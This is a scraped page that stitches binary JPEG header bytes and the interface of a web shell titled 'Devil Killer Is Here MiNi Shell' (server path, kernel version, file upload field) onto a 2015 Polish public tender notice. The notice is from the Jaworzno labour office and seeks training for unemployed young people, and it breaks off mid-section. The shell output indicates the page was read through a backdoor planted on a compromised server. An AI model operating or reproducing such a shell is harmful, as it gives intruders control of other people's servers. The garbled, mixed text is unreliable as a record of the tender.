JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150918/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150918/245146-N-2015.html

<p class="kh_header"><b>Jaworzno: Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 245146 - 2015; data zamieszczenia: 18.09.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Jaworznie , ul. Północna 9B, 43-600 Jaworzno, woj. śląskie, tel. 032 6181924, faks 032 6181901.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup-jaworzno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa szkoleniowa w zakresie zorganizowania i przeprowadzenia grupowych szkoleń osób bezrobotnych w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego w następujących zakresach:
zakres I:Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji,
zakres II:  Sprzedawca - 5 osób w I edycji,
zakres III: Księgowość z elementami kadr i płac - 5 osób w I edycji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał, że posiada aktualny wpis do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy ze względu na siedzibę Wykonawcy - zgodnie z rozporządzeniem Ministra Gospodarki i Pracy z dnia 27 października 2004r. w sprawie rejestru instytucji szkoleniowych /tekst jednolity: Dz. U. z 2014r, poz. 781/
Ocena spełnienia warunku nastąpi na podstawie przedstawionego przez Wykonawcę oświadczenia, o którym mowa w rozdziale 6 ust.3 pkt 3.1 i pkt 3.2 SIWZ</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełnienia warunku wymagane jest by Wykonawca wykazał,
że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - wykonał co najmniej dwie usługi odpowiadające swoim rodzajem przedmiotowi zamówienia:
1) . zakres I - co najmniej dwie usługi szkoleniowe z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT na minimum 10 osób. Zamawiający uzna również warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: Magazynier oraz Operator-kierowca wózka jezdniowego wraz z wymianą butli gazowych oraz egzaminem UDT. Zamawiający uzna również inną kombinację pod warunkiem, że suma szkoleń ujętych w wykazie głównych usług potwierdzi zrealizowanie co najmniej dwóch usług z zakresu Magazynier z obsługą wózka jezdniowego i egzaminem UDT. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
2)zakres II - co najmniej dwie usługi szkoleniowe z zakresu Sprzedawca na minimum 5 osób. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
3) zakres III wykonał co najmniej dwie usługi z zakresu Księgowość z elementami kadr i płac na minimum 5 osób. Zamawiający uzna  warunek za spełniony w przypadku oddzielnej realizacji tych szkoleń, czyli oddzielnie po dwa szkolenia: księgowość oraz szkolenia z zakresu kadr i płac. Zamawiający uzna również warunek za spełniony w przypadku realizacji szkoleń o innej nazwie, o zakresie odpowiadającym przedmiotowi zamówienia. Jeżeli z nazwy szkolenia nie wynika bezpośrednio, iż odpowiada swoim rodzajem przedmiotowi zamówienia należy wskazać jakie moduły zawiera.
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6 ust.4 pkt 4.1-4.3 SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie dysponowania osobami zdolnymi do wykonania zamówienia, Wykonawca wyznaczy
do realizacji przedmiotu zamówienia kadrę wykładowczą, spełniającą następujące warunki:
1)  wykładowcy prowadzący zajęcia teoretyczne muszą posiadać wykształcenie wyższe związane z tematyką prowadzonej jednostki modułowej lub wykształcenie wyższe oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
	W przypadku jednostki modułowej: obsługa wózków jezdniowych wraz z wyminą butli gazowych oraz obsługa kasy fiskalnej i terminali płatniczych Zamawiający dopuszcza możliwość prowadzenia szkolenia przez wykładowców posiadających wykształcenie minimum średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
2) wykładowcy prowadzący zajęcia praktyczne oraz ćwiczenia muszą posiadać co najmniej	wykształcenie średnie związane z tematyką prowadzonej jednostki modułowej lub	wykształcenie średnie oraz minimum 3 letnie doświadczenie zawodowe w prowadzeniu zajęć 	dydaktycznych zgodnych z tematyką prowadzonej jednostki modułowej.
3) każda z osób prowadzących zajęcia musi posiadać co najmniej 2 letnie doświadczenie 	zawodowe w prowadzeniu zajęć  dydaktycznych zgodnych z tematyką prowadzonej jednostki 	modułowej;
Ocena spełnienia warunku nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w rozdziale 6  ust.5  pkt 5.1-5.2 SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>oświadczenie o  wpisie do rejestru instytucji szkoleniowych prowadzonego przez właściwy wojewódzki urząd pracy. (zał. nr 10 do SIWZ)</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.85</li>
<li>2 - posiadanie certyfikatu jakości usług - 0.1</li>
<li>3 - prowadzenie analiz skuteczności i efektywności przeprowadzanych szkoleń - 0.05</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>2. Zamawiający przewiduje możliwość zmiany umowy, po wzajemnym uzgodnieniu stron, w zakresie:
1) osób prowadzących szkolenie. Po uzyskaniu pisemnej zgody Zamawiającego, w szczególnie 	uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której nie można było 	wcześniej przewidzieć) Wykonawca może dokonać wymiany osób delegowanych do wykonania 	przedmiotu umowy. W takiej sytuacji Wykonawca przedstawi Zamawiającemu 
     pisemnie propozycję  zmiany  wraz  z  jej  uzasadnieniem,    wskazując  osobę/y o  co  najmniej
	porównywalnych kwalifikacjach jakie określono w SIWZ. Jednocześnie Wykonawcy nie	przysługuje roszczenie o zwrot kosztów wynikających bezpośrednio lub pośrednio z wymiany	osób, wyznaczonych przez Wykonawcę do wykonania przedmiotu zamówienia.
2) terminu realizacji przedmiotu zamówienia. Po uzyskaniu pisemnej zgody Zamawiającego
	w szczególnie uzasadnionych przypadkach (np. choroba, zgon lub inna sytuacja losowa, której	nie można było wcześniej przewidzieć) Zamawiający może wyrazić zgodę na zmianę terminu	realizacji szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu pisemnie	propozycję zmiany wraz z jej uzasadnieniem. Zmiana terminu szkolenia  - w szczególnie	uzasadnionych przypadkach, np. niezakwalifikowanie się odpowiedniej liczby	uczestników szkolenia - może także nastąpić z inicjatywy Zamawiającego.	Jednocześnie Wykonawcy nie  przysługuje roszczenie o zwrot kosztów wynikających	bezpośrednio lub pośrednio ze zmiany terminu realizacji przedmiotu zamówienia.
3) miejsca przeprowadzenia szkolenia. Po uzyskaniu pisemnej zgody Zamawiającego,                           	w szczególnie uzasadnionych przypadkach, Wykonawca może dokonać zmiany miejsca	przeprowadzenia szkolenia. W takiej sytuacji Wykonawca przedstawi Zamawiającemu	pisemnie propozycję zmiany wraz z jej uzasadnieniem, wskazując propozycję miejsca 	szkolenia o co najmniej porównywalnych warunkach jakie określono w SIWZ, przy	jednoczesnym spełnieniu warunku, o którym mowa w Rozdziale 3, pkt. 3, ppkt. 3.1 SIWZ. 	Jednocześnie Wykonawcy nie przysługuje roszczenie o zwrot kosztów wynikających 	bezpośrednio lub pośrednio ze zmiany miejsca szkolenia.
4) zmniejszenia ilości osób przewidzianych do przeszkolenia - w szczególnie uzasadnionych 	przypadkach tj. rezygnacja osoby zakwalifikowanej na szkolenie w terminie uniemożliwiającym 	dokonanie  kolejnego  naboru, brak  osób  spełniających  warunki  skierowania  na szkolenie, 	Zamawiający może zmniejszyć ilość skierowanych na szkolenie maksymalnie o 1 osobę.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pup-jaworzno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.09.2015 godzina 08:00, miejsce: Powiatowy Urząd Pracy w Jaworznie, ul. Północna 9b, 43-600 Jaworzno, I piętro pokój nr 124..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w ramach projektu Aktywizacja osób młodych pozostających bez pracy w mieście Jaworznie (I) Poddziałania 1.1.1. Programu Operacyjnego Wiedza Edukacja Rozwój 2014-2020 współfinansowanego ze środków Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> zakres I:Magazynier z obsługą wózka jezdniowego i egzaminem UDT - 10 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni. 
Program szkolenia: minimalna ilość godzin - 190, w tym minimum  90 godzin ćwiczeń.
Program szkolenia musi zawierać:
1. modułowy program szkolenia zawodowego dla zawodu: magazynier, z zakresu: praca w handlu      hurtowym (kod zawodu: 413103) z następującymi jednostkami modułowymi: 
1) przepisy bhp i p.poż w magazynie - hurtowni- minimum 7 godzin, zawierająca następujące jednostki                	szkoleniowe:
- bezpieczeństwo i higiena pracy w jednostce handlowej;
- bhp przy transporcie ręcznym i mechanicznym; 
- bhp przy urządzeniach elektrycznych; 
- ochrona przeciwpożarowa; 
- udzielanie pierwszej pomocy na miejscu wypadku; 
- udzielanie pierwszej pomocy przy oparzeniach, odmrożeniach, zatruciach. 
2) odbiór towarów- minimum 18 godzin, zawierająca następujące jednostki szkoleniowe:
- odpowiedzialność materialna pracownika magazynowego;
- dokumentacja organizacji magazynu; 
- sposoby rozmieszczenia towarów w magazynie;
- proces magazynowy w magazynach kompletacyjnych;
- systemy kompletacji;
- znakowanie ładunków kodami kreskowymi;
- odbiór ilościowy i jakościowy;
- gospodarka opakowaniami w magazynach.
3) zasady poprawnego przechowywania towarów- minimum 13 godzin, zawierająca następujące                		 jednostki szkoleniowe:
- zasady właściwego przechowywania towarów;
-  instalacje w budynkach magazynowych; 
- urządzenia do składowania;
- magazynowe środki transportu;
- pomocnicze urządzenia magazynowe; 
- czynniki wpływające na przechowywanie towarów;
- zmiany zachodzące w przechowywanych towarach;
- szkodniki magazynowe;
- ubytki towarowe.
4) obsługa programu SUBIEKT  dla WINDOWS do prowadzenia gospodarki magazynowej - minimum 	30 godzin, zawierająca następujące jednostki szkoleniowe:
- konfiguracja programu;
- sporządzanie dokumentów zakupu, zamówień do dostawcy i rozliczanie zobowiązań finansowych;
- sporządzanie dokumentów sprzedaży, zamówień od klienta i rozliczanie należności finansowych; 
- sporządzanie dokumentów korygujących zakupu i sprzedaży; 
-sporządzanie dokumentów przyjęcia magazynowe, wydania magazynowe, przesunięcia                                       	między magazynowe;
- przeprowadzanie inwentaryzacji; 
- budowa i obsługa drukarki fiskalnej; 
- drukowanie raportów.
2. jednostkę modułową: obsługa kasy fiskalnej  i terminali płatniczych - minimum 10 godzin,
3. jednostkę modułową: podstawowe zasady higieny - minimum 10 godzin,
4. jednostkę modułową: obsługa wózków jezdniowych wraz z wymianą butli gazowych- minimum                 	67 godzin,
5. jednostkę modułową: nowoczesne techniki sprzedaży- minimum 10 godzin,
6.jednostkę modułową: obsługa programu SYMFONIA w zakresie gospodarki magazynowej 
- minimum 25 godzin.
Dodatkowe wymagania: Część szkolenia dotycząca obsługi wózka jezdniowego ma przygotować uczestników do samodzielnego prowadzenia i obsługi wózka w transporcie wewnątrzzakładowym oraz powinna być przeprowadzona w oparciu o program opracowany lub zatwierdzony przez jednostkę      organizacyjną wyznaczoną przez Ministra właściwego do spraw gospodarki zgodnie                                   z  Rozporządzeniem Ministra Gospodarki z dnia 10 maja 2002r. w sprawie bezpieczeństwa i higieny pracy przy użytkowaniu wózków jezdniowych z napędem silnikowym (Dz. U. Nr 70, poz. 650 z późn. zm) lub równoważny.
W ramach szkolenia Wykonawca zorganizuje i przeprowadzi egzamin przed Komisją Urzędu Dozoru                          Technicznego. Egzamin zostanie zorganizowany najpóźniej w ostatnim dniu szkolenia. Każdy uczestnik                    szkolenia powinien otrzymać zaświadczenie zgodnie z Rozdziałem 3 pkt 3. 5 SIWZ oraz zaświadczenie                    kwalifikacyjne wydane przez Urząd Dozoru Technicznego.
Wykonawca zakupi dla każdego uczestnika szkolenia książkę, której tematyka zgodna będzie                            z zakresem szkolenia..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 30.</li></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> zakres II: Sprzedawca - 5 osób w I edycji,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Czas realizacji: nie dłużej niż 6 tygodni.
Program szkolenia: minimalna ilość godzin -180, w tym minimum  120 godzin ćwiczeń.
Program szkolenia musi zawierać:
